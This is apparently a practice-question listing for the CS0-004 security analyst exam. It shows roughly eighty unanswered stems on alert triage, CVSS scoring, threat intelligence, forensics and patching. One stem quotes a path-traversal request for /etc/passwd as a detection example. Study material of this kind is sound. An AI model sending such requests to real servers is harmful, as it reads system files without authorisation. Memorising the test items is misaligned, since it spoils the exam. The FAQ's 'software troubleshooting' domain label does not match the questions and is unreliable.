Hard618Which pipeline controls help prevent vulnerable dependencies reaching production? (Choose two.)
Medium619A security analyst is reviewing an alert from Azure Sentinel that indicates a possible privilege escalation attempt. The alert is based on a correlation rule that detects unusual usage of the 'Add-AzKeyVaultKey' cmdlet by a user who has never used it before. The analyst needs to validate the alert and determine if the activity is malicious. Which THREE actions should the analyst take?
Hard620A threat hunter is creating a hypothesis based on the MITRE ATT&CK framework. The hunter wants to detect adversaries using PowerShell to download files from remote servers. Which ATT&CK technique should the hunter focus on?
Medium621An organization uses MISP (Malware Information Sharing Platform) to share threat intelligence with trusted partners. Which of the following standards is commonly used by MISP to structure and exchange threat intelligence data?
Medium622After a high-priority SOC escalation, file shares show rapid encryption and ransom-note creation from one workstation. What is the best immediate containment action?
Easy623A threat hunter is creating a Sigma rule to detect a specific TTP where an attacker uses reg.exe to create a Run key for persistence. Which of the following Sigma rule event selectors would best detect this activity?
Hard624A company's incident response team is handling a ransomware incident that has encrypted all files on the file server and spread to several workstations. The team has isolated the affected systems and obtained memory dumps and disk images. The CEO demands immediate restoration of operations and suggests paying the ransom to decrypt files quickly. The company has recent backups but they are stored on a network share that was also encrypted. The CISO wants to ensure that the root cause is identified before restoration. As the lead incident responder, which of the following actions should you take NEXT?
Hard625A security analyst is reviewing a vulnerability scan report from Rapid7 InsightVM. The report shows that a Tomcat server has a plugin finding indicating that the 'Server' header is set to 'Apache-Coyote/1.1', which reveals the server version. Which type of vulnerability does this represent?
Medium626A security analyst needs to verify that a critical patch was successfully applied to all endpoints in the organization after an emergency patch deployment. Which phase of the vulnerability lifecycle is the analyst performing?
Easy627An analyst receives an alert that a user's workstation contacted a known command-and-control (C2) IP address. The analyst checks the EDR logs and finds that the process 'svchost.exe' initiated the connection. What should the analyst do next to determine if this is a true positive?
Medium628A security analyst is reviewing a vulnerability scan report and sees a critical finding with a CVSS v3.1 base score of 9.8. The vector string is AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Which of the following best describes the attack vector component (AV:N)?
Easy629A security analyst is investigating a reported vulnerability in a web application. The team uses Burp Suite for DAST scanning. Which TWO of the following findings would be classified as injection vulnerabilities according to OWASP Top 10?
Medium630A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from a known internal IP address to a file server. The user authenticated successfully on the next attempt. Which classification best describes this alert?
Easy631A security analyst is reviewing a SIEM alert that triggered on a known malicious IP address communicating with an internal server. The analyst checks the threat intelligence feed and confirms the IP is associated with a command-and-control server. What type of alert is this?
Easy632A SOC analyst is triaging a SIEM alert for a registry modification on a workstation. The alert indicates a new Run key was added under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Which of the following is the most likely purpose of this modification?
Medium633During a vulnerability scan, the scanner reports a high number of open ports on a server that is supposed to be a hardened web server. The analyst investigates and finds that the server is running unnecessary services. Which of the following is the MOST effective long-term solution?
Hard634A threat intelligence analyst has produced a report containing specific Indicators of Compromise (IoCs) such as IP addresses, domain names, and file hashes. Which TWO audiences are most appropriate for this type of intelligence? (Select TWO.)
Hard635A security analyst is reviewing the results of a container image scan using Trivy. The scan reports a critical vulnerability in a base image layer. The development team states that the vulnerability is not exploitable because the affected library is not used in the application. According to vulnerability management best practices, what should the analyst do?
Hard636During a vulnerability assessment of a Kubernetes cluster, a security analyst finds that a container is running with privileged mode enabled and has a hostPath mount that grants write access to the host's /var/log directory. Which of the following is the most significant security risk associated with this configuration?
Hard637During a security incident, the incident response team has identified that a phishing email led to credential theft and lateral movement. Which component of the incident report should detail the sequence of events from initial compromise to containment?
Medium638Arrange the steps for configuring a firewall rule set in the correct order.
Medium639A security analyst needs to share threat intelligence with other organizations in a standardized format. Which of the following standards should the analyst use?
Easy640During a forensic investigation, an analyst needs to acquire memory from a Linux server. Which tool is specifically designed for this purpose?
Hard641During a post-incident activity, the CSIRT performs a root cause analysis for a data breach. They discover that the breach originated from a misconfigured S3 bucket that allowed public read access. Which of the following actions should be included in the lessons learned to prevent recurrence?
Hard642A security analyst is reviewing a vulnerability scan report and finds a critical vulnerability with a CVSS v3.1 base score of 9.8. The vector string is: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Which of the following best describes the attack vector and impact of this vulnerability?
Medium643A threat hunter wants a portable detection for suspicious rundll32 execution that can be converted for multiple SIEM platforms. Which artefact format best fits this goal?
Hard644Which of the following is the best data source for detecting DNS tunneling activity?
Easy645A security analyst is tuning a SIEM correlation rule that generates alerts when a single user logs into more than 10 workstations within 5 minutes. The rule is producing excessive false positives due to service accounts performing automated tasks. Which of the following is the best tuning approach to reduce false positives while still detecting potential lateral movement?
Medium646An analyst is reviewing a memory dump of a compromised system and notices that the memory of a legitimate process (e.g., notepad.exe) contains a PE header and executable code that is not part of the original binary. Which technique is most likely being used?
Hard647An analyst is performing static analysis on a suspicious executable file. Which of the following would be MOST useful to identify potential malicious behavior without executing the file?
Medium648A company has implemented a vulnerability management program. The security team needs to ensure that all critical vulnerabilities are remediated within 30 days. Which of the following metrics would BEST measure the effectiveness of this goal?
Medium649An analyst runs the above command on a server. Based on the exhibit, which of the following is the MOST likely scenario?
Medium650A SOC wants to measure whether alert enrichment is improving operations. Which metrics are useful? (Choose two.)
Hard651A security analyst is conducting a dynamic application security testing (DAST) scan of a REST API. The scanner reports a potential Server-Side Request Forgery (SSRF) vulnerability. The analyst needs to confirm the finding manually. Which TWO of the following techniques are most appropriate for validating SSRF?
Hard652An incident responder is documenting the root cause of a data breach. Which THREE components are essential to include in the root cause analysis section of the incident report? (Select THREE.)
Medium653An organization uses OpenSCAP for compliance scanning. What is the primary purpose of OpenSCAP?
Easy654A security analyst suspects an insider threat based on unusual data access patterns by an employee. According to best practices, which TWO actions should the analyst take FIRST?
Medium655A security analyst is reviewing a suspicious email attachment. Which THREE of the following are safe analysis techniques? (Choose THREE)
Medium656During a penetration test, an analyst successfully exploits a privilege escalation vulnerability to gain root access on a Linux server. The server is used for application development. Which of the following remediation actions would be MOST effective in preventing similar attacks?
Hard657A financial services organization experienced a ransomware incident that encrypted several file servers. The CISO must deliver a post-incident report to the board of directors and the audit committee. The report must communicate both the business impact and the effectiveness of the response. Which of the following should be included in this executive-level report? (Choose two.)
Hard658A forensic analyst is investigating a suspected data breach involving a compromised workstation. The analyst wants to collect volatile data in accordance with the order of volatility. Which sequence of data collection is correct?
Hard659Order the steps for a typical patch management process.
Medium660During a network traffic analysis, a security analyst notices a host communicating with an external IP address over TCP port 443 using a self-signed certificate. The traffic flows are consistent in size and occur every 60 seconds. The external IP is not on any threat intelligence feeds. What does this pattern most likely indicate?
Medium661A security analyst is triaging an alert from the EDR that shows the process 'powershell.exe' with a parent process of 'winword.exe'. The user recently opened a document from an email. What is the most likely explanation?
Medium662A SOC analyst is reviewing logs from a web server and sees the following request: GET /../../etc/passwd HTTP/1.1. Which type of web attack is this?
Medium663A security analyst is using a container image scanner to identify vulnerabilities in a Kubernetes deployment. Which of the following tools is specifically designed for container image scanning?
Medium664A security analyst reviews a Nessus scan result for a web server. The plugin output indicates a critical vulnerability with CVSS v3.1 base score 9.8. The CVSS vector is AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Which of the following best describes the attack complexity?
Medium665What is the primary purpose of performing credentialed vulnerability scans?
Easy666A security analyst is configuring a vulnerability scanner to perform a scan of a network segment. The analyst wants to minimize the risk of disrupting critical production systems during the scan. Which of the following scanner settings should the analyst adjust?
Medium667During a configuration compliance scan using OpenSCAP, a security analyst finds that several Windows servers have the 'Network access: Do not allow anonymous enumeration of SAM accounts' setting set to 'Disabled'. This finding corresponds to a CIS Benchmark recommendation. Which of the following describes the most appropriate remediation step for this finding?
Hard668A security analyst reviews a SIEM alert that fired when a user successfully logged into a server from a remote IP address at 3 AM. The user is a system administrator who often works late. What is the most appropriate initial classification of this alert?
Easy669A security analyst is reviewing a vulnerability scan report and notices that a plugin output indicates a potential misconfiguration in a web server that allows directory listing. The analyst wants to verify this finding manually. Which of the following tools would be most appropriate to confirm the vulnerability?
Medium670A security analyst is using a DAST tool to test a web application. Which of the following vulnerabilities would the tool most likely identify?
Easy671A company has a policy to remediate vulnerabilities within 30 days. A critical vulnerability is discovered on a database server. The patch requires a reboot, and the database cannot be taken offline during business hours. Which of the following is the BEST approach?
Easy672A security analyst is configuring a vulnerability scanner for internal network scanning. The analyst wants to ensure the scanner can identify missing patches and software configurations that require administrative privileges to read. Which scan type should the analyst configure?
Medium673A security analyst is reviewing network traffic and suspects a host is infected with malware that uses a domain generation algorithm (DGA) for C2 communication. Which two of the following indicators are most consistent with DGA activity?
Medium674A security analyst is reviewing a DAST scan report for a web application. The report indicates a vulnerability where the application fails to properly validate user-supplied data before using it in a database query. This is most likely which type of vulnerability?
Medium675A CI pipeline blocks a container image because the base layer contains a critical OpenSSL CVE. The application team says the vulnerable binary is not used. What is the BEST next step? For business prioritization, Which recommendation gives the best risk-based order of work?
Easy676The SOC receives an alert from a network sensor showing an internal host communicating with a known malicious IP over HTTPS. The analyst cannot find any process making outbound connections on the host. What should the analyst do next?
Medium677A SOC analyst is investigating an alert from Azure Sentinel indicating a user account logged in from an unfamiliar location. The analyst wants to determine if this is a true positive. Which TWO additional log sources should the analyst correlate to make an informed decision?
Medium678During a patch management process, an organization uses a staging environment to test patches before deployment. Which of the following is the primary purpose of patch testing in a staging environment?
Medium679A security analyst is prioritizing vulnerabilities for remediation. Which THREE factors from the CISA Known Exploited Vulnerabilities (KEV) catalog should the analyst consider? (Select THREE.)
Medium680During forensic analysis of a compromised server, an analyst needs to preserve evidence in order of volatility. Which of the following actions should the analyst perform FIRST?
Hard681An analyst wants to capture all traffic to and from a specific IP address for analysis. Which command-line tool is most appropriate?
Medium682An organization has experienced a data breach involving personally identifiable information (PII). The incident response team has contained the breach and eradicated the threat. During the post-incident activity phase, which activity is MOST critical to prevent future similar incidents?
Medium683An analyst is configuring correlation rules in a SIEM. Which TWO data sources are essential for detecting lateral movement using pass-the-hash attacks?
Easy684An incident response team is analyzing a suspected malware outbreak on a corporate network. Which three of the following actions should be performed as part of the containment phase? (Choose three.)
Medium685An organization performs quarterly vulnerability scans of its internal network. The scans have a high number of false positives for out-of-date software that is actually up to date. Which of the following would BEST improve the accuracy of the scans?
Easy686An analyst receives a threat intelligence feed containing IOCs in STIX format. Which of the following BEST describes the purpose of STIX?
Easy687A threat hunter is reviewing osquery data from endpoints and notices that the Windows Registry key 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' contains an entry for 'C:\Users\Public\svchost.exe'. Which of the following best describes the significance of this finding?
Medium688A large enterprise uses a vulnerability management platform that integrates with Active Directory and a configuration management database (CMDB). During a quarterly scan, a critical vulnerability (CVE-2021-44228) is detected on a legacy application server running an end-of-life (EOL) version of Java. The server supports a critical business process and cannot be upgraded or patched because the vendor no longer provides updates. The analyst must reduce the risk to an acceptable level. What is the best approach?
Hard689After a DDoS attack, the CSIRT wants to share IOCs with other organizations. Which protocol is specifically designed for automated, real-time threat intelligence sharing?
Medium690A regulator asks for incident evidence after a data exposure. Which items should be coordinated before disclosure? (Choose two.)
Hard691A security analyst is reviewing a SIEM alert for a single failed login attempt from an internal IP address to a file server. The analyst determines this is a false positive. Which step should the analyst take next?
Easy692A security analyst is conducting a proactive threat hunt for lateral movement techniques. The analyst examines EDR data for unusual parent-child process relationships. Which three process chains are indicative of lateral movement? (Select THREE.)
Hard693An analyst is reviewing a vulnerability scan report for a containerized application. The scan identifies a critical vulnerability in a base image used by multiple containers. The application is deployed in a Kubernetes cluster with network policies restricting ingress. The vulnerability has a CVSS v3.1 score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). However, the EPSS score is 0.001 (0.1%). Which of the following should the analyst prioritize?
Hard694A security team is scanning container images with Trivy and finds a vulnerability with CVSS v3.1 vector AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H. The vulnerability exists in a container running as a privileged container on a Kubernetes cluster. The team is prioritizing based on risk. Given the CVSS vector, which factor most significantly reduces the likelihood of exploitation in this context?
Hard695A vulnerability report has 900 findings. One medium CVSS vulnerability is listed in CISA KEV and has high EPSS; several high CVSS issues are not exploitable in the environment. What should the analyst recommend? For business prioritization, Which recommendation gives the best risk-based order of work?
Hard696A cloud security posture tool reports public access on object storage. Which follow-up checks matter? (Choose two.)
Hard697Which three of the following are key considerations when implementing a vulnerability management lifecycle in an enterprise environment? (Choose three.)
Medium698During a forensic investigation of a compromised Linux server, the analyst needs to acquire memory for analysis. The system is running and the analyst cannot power it off. Which tool is MOST appropriate for acquiring memory in this scenario?
Hard699Which of the following is the correct order of volatility for digital evidence?
Easy700Which tool would best allow a security analyst to capture and analyze packets in real time to investigate a network anomaly?
Easy701A security analyst is configuring a container image scanning tool to identify vulnerabilities in a Docker image before deployment. Which of the following tools is commonly used for container image scanning?
EasyOther domains
All CS0-004 exam domains
Frequently asked questions
- What does the software troubleshooting domain cover on the CS0-004 exam?
- software troubleshooting questions test whether you can apply the concept in context, not just recognise a definition.
- How many questions are in this domain?
- This page lists all 701 software troubleshooting questions in the CS0-004 question bank. The actual exam draws from this domain proportionally to its weighting in the official exam blueprint.
- What is the best way to practise this domain?
- Start with a short focused session (10 questions) to identify gaps, then work through explanations. Repeat with a longer session once the weak areas feel solid.
- Can I practise only software troubleshooting questions?
- Yes — the session launcher on this page filters questions to this domain only. Choose any session length for inline explanations and scoring.